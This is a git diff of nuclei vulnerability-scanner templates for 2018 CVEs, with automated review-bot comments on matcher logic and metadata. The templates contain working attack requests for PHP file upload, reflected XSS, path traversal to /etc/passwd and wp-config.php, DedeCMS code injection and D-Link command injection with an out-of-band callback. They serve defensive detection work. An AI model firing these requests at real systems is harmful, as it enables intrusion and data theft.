@@ -50,32 +62,25 @@ requests: Content-Type: application/octet-stream ------WebKitFormBoundary20kgW2hEKYaeF5iP-- - - | - GET /Uploads/{{randstr}}.php7?cmd=echo+"roxyfileman"+|+rev HTTP/1.1 + GET /Uploads/{{randstr}}.php7 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word part: body words: - - "namelifyxor" - - - type: word - part: header - words: - - text/html + - "f76d6a5f7491700cc3a678bdba2902d3" - type: status status: - 200 - -# Enhanced by mp on 2022/10/07 +# digest: 4a0a004730450220437d3c29a18e53486a8e39f9ad913b02a35912b2bcb3c21e63e069c76fe4f154022100a4d6a84d1e7d454bdc3f5c9758a7d44ea6d1c23ce4ad0a31a88d07f3a9aad85b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-20608.yaml b/nuclei-templates/CVE-2018/CVE-2018-20608.yaml index 10203a2f25..f7b54892cb 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-20608.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-20608.yaml @@ -5,23 +5,26 @@ info: author: ritikchaddha severity: high description: Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI. + impact: | + The vulnerability can lead to the exposure of sensitive information, such as server configuration details. remediation: | Update Imcat to the latest version or apply the necessary patches to fix the Phpinfo Configuration vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-20608 + - https://github.com/SexyBeast233/SecBooks classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-20608 cwe-id: CWE-200 - epss-score: 0.03654 - epss-percentile: 0.90703 + epss-score: 0.0111 + epss-percentile: 0.84208 cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: txjia product: imcat - tags: cve,cve2018,imcat,phpinfo,config + tags: cve2018,cve,imcat,phpinfo,config,txjia http: - method: GET 
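Review bot: The follow-up request now fetches `/Uploads/{{randstr}}.php7` without the old `cmd=` parameter and the body matcher expects `f76d6a5f7491700cc3a678bdba2902d3` instead of `namelifyxor`, but the uploaded file body that would have to emit that marker sits above line 50 and is not touched by either hunk of this file, so it cannot be confirmed here that the upload payload was changed in step; if the body still relies on the `cmd` parameter the marker never appears and the template silently stops detecting. Replacing the parameter-driven request with a fixed marker is the right direction for an `intrusive` template. The template still leaves `{{randstr}}.php7` on the target with no removal step, which the `intrusive` tag signals but a short comment on the raw block could state explicitly.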
@@ -46,4 +49,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body -# digest: 480a0045304302207bbfe695fdf3797ec038d2e255d4b16760633a22259b96aa3b313c4c8a17b536021f42982c5df00518d9168b901393139e1d9b6495d8e642c24a4005998844225d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a172bf2d6f5205be1210274d0b843b9ed22d1642071ca1ef3f3a640f8041c9d022100965b93625f3e57ec307aa6beaba6e21a873855c77fcf4b7c48c63029bb2fffc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-2392.yaml b/nuclei-templates/CVE-2018/CVE-2018-2392.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-2392.yaml rename to nuclei-templates/CVE-2018/CVE-2018-2392.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-3810.yaml b/nuclei-templates/CVE-2018/CVE-2018-3810.yaml deleted file mode 100644 index 4874a8a4b4..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-3810.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-3810 -info: - name: WordPress Smart Google Code Inserter Authentication Bypass - author: princechaddha - severity: critical - reference: https://www.exploit-db.com/exploits/43420 - tags: wordpress,cve,cve2018 -requests: - - method: POST - path: - - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode" - body: 'sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode' - headers: - Content-Type: application/x-www-form-urlencoded - - method: GET - path: - - "{{BaseURL}}/" - matchers-condition: and - matchers: - - type: word - words: - - "text/html" - part: header - - type: word - words: - - '' - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-5316.yaml b/nuclei-templates/CVE-2018/CVE-2018-5316.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-5316.yaml rename to nuclei-templates/CVE-2018/CVE-2018-5316.yaml 
diff --git a/nuclei-templates/CVE-2018/CVE-2018-5715.yaml b/nuclei-templates/CVE-2018/CVE-2018-5715.yaml index 5097ee9d4b..fc043311e1 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-5715.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-5715.yaml @@ -1,44 +1,37 @@ id: CVE-2018-5715 - info: - name: SugarCRM 3.5.1 - Cross-Site Scripting + name: SugarCRM 3.5.1 - Reflected XSS author: edoardottt severity: medium - description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable). + description: phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable). reference: - https://www.exploit-db.com/exploits/43683 + - https://nvd.nist.gov/vuln/detail/CVE-2018-5715 - https://m4k4br0.github.io/sugarcrm-xss/ - https://www.exploit-db.com/exploits/43683/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-5715 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-5715 cwe-id: CWE-79 metadata: - google-query: intext:"SugarCRM Inc. All Rights Reserved" + google-dork: intext:"SugarCRM Inc. All Rights Reserved" shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" - tags: sugarcrm,xss,edb,cve,cve2018 - + tags: cve,cve2018,sugarcrm,xss requests: - method: GET path: - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word part: body words: - '&"/>=&"><< Back

' - - type: word part: header words: - "text/html" - - type: status status: - 200 - -# Enhanced by mp on 2022/08/11 diff --git a/nuclei-templates/CVE-2018/CVE-2018-6184.yaml b/nuclei-templates/CVE-2018/CVE-2018-6184.yaml index 96f81c4eda..522a51ae06 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-6184.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-6184.yaml @@ -6,26 +6,30 @@ info: severity: high description: | Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Upgrade to the latest version of Zeit Next.js (>=4.2.3) to mitigate this vulnerability. reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/NextFrameworkPathTraversal.java - https://github.com/zeit/next.js/releases/tag/4.2.3 - https://nvd.nist.gov/vuln/detail/CVE-2018-6184 + - https://github.com/lnick2023/nicenice + - https://github.com/masasron/vulnerability-research classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-6184 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.70586 + epss-percentile: 0.72998 cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit product: next.js shodan-query: html:"/_next/static" - tags: cve,cve2018,nextjs,lfi,traversal + tags: cve2018,cve,nextjs,lfi,traversal,zeit http: - method: GET 
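Review bot: The hunk removes `matchers-condition: and` but keeps all three matchers (body word, `text/html` header, status 200), and nuclei's default when that key is absent is OR, so after this change any 200 HTML page under `index.php?action=Login` satisfies the template whether or not the `&"/>=&"><< Back` reflection is present. Restore the line, `matchers-condition: and`, directly above `matchers:`, or drop the header and status matchers so the body reflection alone decides. The matcher list itself is unchanged by the commit; its first entry begins on the preceding diff line.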
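Review bot: The added `impact` text for CVE-2018-6184 claims an attacker can "execute arbitrary code", but the classification kept in the same hunk is `C:H/I:N/A:N` (7.5) and the tags are `lfi,traversal`, i.e. a read-only file disclosure, so the impact statement outruns the vector. Suggest `impact: | An unauthenticated attacker can read arbitrary files reachable through the /_next request namespace, exposing server-side source and configuration that may aid further attacks.` The two GitHub references added here are personal research collections rather than advisories; keep the `releases/tag/4.2.3` link as the authoritative fix pointer.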
@@ -42,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ec36d491882b47a3833f325a56f3d0564436dbb6cfd00ae68e2d1a687d5aded022100911abf6f4670157ff9bcb8ecb2d152c08553d66445f2f5009a7484f638d3e455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046ed6ab052aa19638a0ffc3dcbee16692a234b44a030f4b38d7b47aa8d9451c8022100f4af3e59fc9802e8697ff78159b0c24ed36a4c06abd1f7d3fe55618b7945eb56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-6530.yaml b/nuclei-templates/CVE-2018/CVE-2018-6530.yaml index fc3e9f27d1..9555cd9020 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-6530.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-6530.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-6530 - https://github.com/soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto 
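Review bot: The added `remediation` for CVE-2018-6530 says only "apply the latest firmware update", while the reference list already carries vendor patch notes that name the fixed builds for two of the affected models (DIR-860L REVA 1.11B01 and DIR-868L REVA 1.20B01, visible as context in the next hunk). Naming them makes the advice checkable: `remediation: | Update to the D-Link firmware that fixes the soap.cgi command injection (DIR-860L REVA 1.11B01, DIR-868L REVA 1.20B01; see the vendor advisories for the other listed models) or isolate the device's management interface.` If the CVE is on the CISA KEV list, as the retained `kev` tag implies, linking that entry would also give operators the due-date context.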
@@ -13,17 +17,18 @@ info: - ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf - ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-6530 cwe-id: CWE-78 - epss-score: 0.94099 - cpe: cpe:2.3:o:d-link:dir-860l_firmware:*:*:*:*:*:*:*:* + epss-score: 0.93644 + epss-percentile: 0.99057 + cpe: cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: d-link + vendor: dlink product: dir-860l_firmware - tags: cve,cve2018,d-link,rce,unauth,kev + tags: cve,cve2018,d-link,rce,oast,unauth,kev,dlink http: - raw: @@ -47,3 +52,4 @@ http: part: interactsh_request words: - "User-Agent: curl" +# digest: 4a0a00473045022100cb992aea6ed9345fa954525bb3ec088e711e697ac7be95a866d69a346c85e1290220143c40bfe9bf272a8000dcf2bff011c41a7b66adf23a45fa8ff59ecedae94609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-6910.yaml b/nuclei-templates/CVE-2018/CVE-2018-6910.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-6910.yaml rename to nuclei-templates/CVE-2018/CVE-2018-6910.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7251.yaml b/nuclei-templates/CVE-2018/CVE-2018-7251.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-7251.yaml rename to nuclei-templates/CVE-2018/CVE-2018-7251.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-7282.yaml b/nuclei-templates/CVE-2018/CVE-2018-7282.yaml index 82a8c08013..f346c8cd40 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-7282.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-7282.yaml 
@@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7282 cwe-id: CWE-89 - epss-score: 0.21784 - epss-percentile: 0.95966 + epss-score: 0.15744 + epss-percentile: 0.95443 cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -27,7 +27,7 @@ info: product: printmonitor shodan-query: title:"PrintMonitor" product": printmonitor - tags: cve,cve2018,sqli,printmonitor,unauth + tags: cve2018,cve,sqli,printmonitor,unauth,titool variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" @@ -50,4 +50,4 @@ http: - 'status_code == 200' - 'contains(body, "PrintMonitor") && contains(header, "text/html")' condition: and -# digest: 4a0a00473045022100a333462c53d61a1014e13cf5f8bd3b44c8d1239c4ea61e90a056aed0baa6851d02200c72d3a23baa43e3b14aa0b33147e7611c4cd8383bb8a7538b26cd647d25cdb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100943388e630f780887fc461ebd2b12bde74a8292ae62fade14d472388d6320299022100e0ef9ae2497c7b48c98c934d40e7a921b8c47516acc6bbcbb11c401c2c34ff5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-7467.yaml b/nuclei-templates/CVE-2018/CVE-2018-7467.yaml index 209cbb7767..4a8c9c5c27 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-7467.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-7467.yaml @@ -7,13 +7,13 @@ info: reference: - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-7467 - - http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-7467 cwe-id: CWE-200 tags: cve,cve2018,axxonsoft,lfi + requests: - raw: - |+ 
diff --git a/nuclei-templates/CVE-2018/CVE-2018-7490.yaml b/nuclei-templates/CVE-2018/CVE-2018-7490.yaml deleted file mode 100644 index c65d3686b3..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-7490.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: CVE-2018-7490 -info: - name: uWSGI PHP Plugin Directory Traversal - author: madrobot - severity: high -requests: - - method: GET - path: - - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:[x*]:0:0:" - part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-7653.yaml b/nuclei-templates/CVE-2018/CVE-2018-7653.yaml index 970645701a..1f4589ccf7 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-7653.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-7653.yaml @@ -11,13 +11,15 @@ info: - https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-7653 - https://github.com/ponyma233/YzmCMS/blob/master/YzmCMS_3.6_bug.md + - https://github.com/anquanquantao/iwantacve + - https://github.com/5ecurity/CVE-List classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-7653 cwe-id: CWE-79 epss-score: 0.00797 - epss-percentile: 0.79636 + epss-percentile: 0.81235 cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -25,7 +27,7 @@ info: product: yzmcms shodan-query: title:"YzmCMS" fofa-query: title="YzmCMS" - tags: packetstorm,cve,cve2018,yzmcms,cms,xss + tags: cve,cve2018,packetstorm,yzmcms,cms,xss http: - method: GET 
@@ -50,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008b71b670e8b34eb9ea8a93171af4744120ec76a79efd23e2a01b767c1880d6ec022100c8a4079f0f8bf2b7becaf974b21a49461cca86991f077443d8ba7cc117190ad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200df73aa8ff0971cc80f47dd8d46f775cca36832a7ffa4d6c951b8503a4f9bf9f022100cf13ce4a2d6aaa51a72fc212a1d7dcd21c694f26d8614f626aeb56b566e7ed0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-7700.yaml b/nuclei-templates/CVE-2018/CVE-2018-7700.yaml deleted file mode 100644 index d834819ecb..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-7700.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2018-7700 -info: - name: DedeCMS V5.7SP2 RCE - author: pikpikcu - severity: high - description: DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code. - reference: - - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2018-7700 - cwe-id: CWE-352 - tags: cve,cve2018,dedecms,rce -requests: - - method: GET - path: - - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" - matchers-condition: and - matchers: - - type: word - words: - - "phpinfo" - - "PHP Version" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-7719.yaml b/nuclei-templates/CVE-2018/CVE-2018-7719.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-7719.yaml rename to nuclei-templates/CVE-2018/CVE-2018-7719.yaml 
diff --git a/nuclei-templates/CVE-2018/CVE-2018-8727.yaml b/nuclei-templates/CVE-2018/CVE-2018-8727.yaml deleted file mode 100644 index a189afd517..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-8727.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2018-8727 -info: - name: Mirasys DVMS Workstation 5.12.6 Path Traversal - author: 0x_akoko - severity: high - description: Mirasys DVMS Workstation versions 5.12.6 and below suffer from a path traversal vulnerability. - reference: - - https://packetstormsecurity.com/files/148266/Mirasys-DVMS-Workstation-5.12.6-Path-Traversal.html - - https://www.cvedetails.com/cve/CVE-2018-8727 - - https://www.onvio.nl/nieuws/cve-mirasys-vulnerability - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-8727 - cwe-id: CWE-22 - tags: cve,cve2018,mirasys,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-9118.yaml b/nuclei-templates/CVE-2018/CVE-2018-9118.yaml index 9db3695e3b..9f254e1203 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-9118.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-9118.yaml 
@@ -1,24 +1,23 @@ id: CVE-2018-9118 + info: name: WP Background Takeover, Directory Traversal <= 4.1.4 author: 0x_Akoko severity: high description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability - reference: - - https://www.exploit-db.com/exploits/44417 - - https://wpvulndb.com/vulnerabilities/9056 - - https://99robots.com/docs/wp-background-takeover-advertisements/ - - https://www.exploit-db.com/exploits/44417/ + reference: https://www.exploit-db.com/exploits/44417 + tags: wordpress,wp-plugin,lfi,cve,cve2018,traversal classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2018-9118 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,cve,cve2018,traversal + requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php' + matchers-condition: and matchers: - type: word diff --git a/nuclei-templates/CVE-2018/CVE-2018-9161.yaml b/nuclei-templates/CVE-2018/CVE-2018-9161.yaml new file mode 100644 index 0000000000..d3295f40cc --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-9161.yaml 
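Review bot: This hunk drops three references (the wpvulndb entry, the vendor documentation and the duplicate EDB link), collapses `reference:` to a single scalar, and rewrites `cvss-score: 7.5` as `7.50`; that reads as a revert to an older revision rather than an improvement, since every other template touched in this patch moves the opposite way (list-form references, numeric score, `tags` after `classification`). Keep the list form, `reference:` / `- https://www.exploit-db.com/exploits/44417` / `- https://wpvulndb.com/vulnerabilities/9056`, and the plain `7.5`. The unchanged `description` still speaks of "an unknown functionality" and "the input value" although the request path two lines below shows exactly `exports/download.php?filename=../../../../wp-config.php`; say that instead.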
@@ -0,0 +1,48 @@ +id: CVE-2018-9161 + +info: + name: PrismaWEB - Credentials Disclosure + author: gy741 + severity: critical + description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + impact: | + An attacker could gain unauthorized access to the application and potentially compromise user accounts and sensitive data. + remediation: | + Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php + - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 + - https://www.exploit-db.com/exploits/44276/ + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-9161 + cwe-id: CWE-798 + epss-score: 0.12574 + epss-percentile: 0.95318 + cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: prismaindustriale + product: checkweigher_prismaweb + tags: cve2018,cve,prismaweb,exposure,edb,prismaindustriale + +http: + - method: GET + path: + - "{{BaseURL}}/user/scripts/login_par.js" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'txtChkUser' + - 'txtChkPassword' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100ffcd63af862f8b9aa24f999ad152b190ff12a716891947bdfcdf6f8928420413022006b1c871ad6ce93fb773c74b29e916effe0a6cb129653f58c5c4eb406cccfe6b:922c64590222798bb761d5b6d8e72950 \ No newline at 
end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-9205.yaml b/nuclei-templates/CVE-2018/CVE-2018-9205.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-9205.yaml rename to nuclei-templates/CVE-2018/CVE-2018-9205.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-9995.yaml b/nuclei-templates/CVE-2018/CVE-2018-9995.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-9995.yaml rename to nuclei-templates/CVE-2018/CVE-2018-9995.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-1000226.yaml b/nuclei-templates/CVE-2018/cve-2018-1000226.yaml index c070e810a9..5eb5e5ebfa 100644 --- a/nuclei-templates/CVE-2018/cve-2018-1000226.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-1000226.yaml 
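Review bot: The body matcher in the new CVE-2018-9161 template only requires the identifiers `txtChkUser` and `txtChkPassword` to appear in `/user/scripts/login_par.js`, not that they carry values, so a build that ships the same file with the credentials blanked out or relocated would still be reported as a critical credential disclosure. If the file assigns them as JavaScript variables, as the description implies, tighten the check to a non-empty assignment, e.g. a `regex` matcher with `txtChkUser\s*=\s*["'][^"']+["']` and the same for `txtChkPassword`, and consider an `extractors:` block so the finding carries its evidence. The exact syntax of login_par.js is not visible here, so confirm the pattern against the ZSL advisory before relying on it.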
@@ -1,21 +1,32 @@ id: CVE-2018-1000226 info: - name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass + name: Cobbler - Authentication Bypass author: c-sh0 severity: critical + description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler. reference: - https://github.com/cobbler/cobbler/issues/1916 - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-1000226 cwe-id: CWE-732 - tags: cve,cve2018,cobbler,auth-bypass + epss-score: 0.01309 + epss-percentile: 0.8563 + cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: cobblerd + product: cobbler + tags: cve2018,cve,cobbler,auth-bypass,cobblerd -requests: +http: - raw: - | POST {{BaseURL}}/cobbler_api HTTP/1.1 @@ -36,9 +47,9 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" - type: word part: header 
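Review bot: The dsl matcher this hunk moves to the top of the list, `!contains(tolower(body), 'faultCode')`, can never fire: `tolower(body)` lower-cases the response while the needle keeps an upper-case C, so the expression is always true and XML-RPC fault responses (`<name>faultCode</name>`) are not excluded as intended. Change the needle to match the lower-cased body, `- "!contains(tolower(body), 'faultcode')"`. The defect predates this patch (the same line is removed further down), but since the commit re-adds it here this is the place to fix it; the remainder of the matcher list continues outside this hunk.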
@@ -50,11 +61,12 @@ requests: words: - "" - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" - - type: regex part: body regex: - "(.*[a-zA-Z0-9].+==)" + + - type: status + status: + - 200 +# digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-1000671.yaml b/nuclei-templates/CVE-2018/cve-2018-1000671.yaml deleted file mode 100644 index d6302807a8..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-1000671.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2018-1000671 - -info: - name: Sympa version =>6.2.16 - Cross-Site Scripting - author: 0x_Akoko - severity: medium - description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs. - reference: - - https://github.com/sympa-community/sympa/issues/268 - - https://vuldb.com/?id.123670 - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-1000671 - cwe-id: CWE-601 - metadata: - shodan-query: http.html:"sympa" - verified: "true" - tags: cve,cve2018,redirect,sympa,debian - -requests: - - method: GET - path: - - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email=' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/08/18 
